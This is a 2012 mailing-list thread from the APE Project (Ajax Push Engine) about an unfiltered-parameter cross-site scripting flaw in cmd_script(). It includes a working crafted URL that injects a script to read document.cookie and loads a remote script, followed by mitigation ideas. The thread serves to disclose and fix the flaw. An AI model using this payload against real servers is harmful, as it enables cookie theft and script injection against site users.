This issue occurs in cmd_script() (src/cmd.c) so I believe it's transport layer independent. There is a line: sendf(callbacki->client->fd, callbacki->g_ape, "%s<html>\n<head>\n\t<script>\n\t\tdocument.domain=\"%s\"\n\t</script>\n", HEADER_DEFAULT, domain); domain is not filtered. It is put as is. The same situation is in JFOREACH few lines below where script urls are pasted.
In my case I used pcre and simple regexp to determine if domain and script are acceptable and it works fine. W dniu wtorek, 11 grudnia 2012 14:43:18 UTC+1 użytkownik RakonDark napisał: > > is the issue for all transport layer ?? > > > > On 11 December 2012 14:25, Pablo Tejada <[email protected] > <javascript:>>wrote: > >> Can a hook temporarily fix the security hole? For example: >> >> Ape.registerHook("script'', function(){ >> return false; >> }) >> On Dec 11, 2012 6:56 AM, "tr!ckle" <[email protected] <javascript:>> >> wrote: >> >>> I managed recently with an issue that allows to inject any js script by >>> preparing link like: >>> >>> http://your.ape.server.domain/?[{%22cmd%22:%22script%22,%22params%22:{%22domain%22:%22any.domain%22,%22scripts%22:[%22http://another.domain.com/your/injected/script.js%5C%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3Cscript+type%3D%5C%22text%2Fjavascript%22]}}]<http://your.ape.server.domain/?[%7B%22cmd%22:%22script%22,%22params%22:%7B%22domain%22:%22any.domain%22,%22scripts%22:[%22http://another.domain.com/your/injected/script.js%5C%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3Cscript+type%3D%5C%22text%2Fjavascript%22]%7D%7D]> >>> >>> It allows either attach script from your url or inject script directly >>> such as in this example. >>> >>> The solution for this issue is to filter both params domain and scripts >>> in file src/cmd.c (function: cmd_script()) in ape server. >>> -- >>> You received this message because you are subscribed to the Google >>> Groups "APE Project" group. >>> To post to this group, send email to [email protected]<javascript:> >>> To unsubscribe from this group, send email to >>> [email protected] <javascript:> >>> For more options, visit this group at >>> http://groups.google.com/group/ape-project?hl=en >>> --- >>> APE Project (Ajax Push Engine) >>> Official website : http://www.ape-project.org/ >>> Git Hub : http://github.com/APE-Project/ >>> >> -- >> You received this message because you are subscribed to the Google >> Groups "APE Project" group. >> To post to this group, send email to [email protected]<javascript:> >> To unsubscribe from this group, send email to >> [email protected] <javascript:> >> For more options, visit this group at >> http://groups.google.com/group/ape-project?hl=en >> --- >> APE Project (Ajax Push Engine) >> Official website : http://www.ape-project.org/ >> Git Hub : http://github.com/APE-Project/ >> > > > > -- > i cant trust, what i not know > -- You received this message because you are subscribed to the Google Groups "APE Project" group. To post to this group, send email to [email protected] To unsubscribe from this group, send email to [email protected] For more options, visit this group at http://groups.google.com/group/ape-project?hl=en --- APE Project (Ajax Push Engine) Official website : http://www.ape-project.org/ Git Hub : http://github.com/APE-Project/
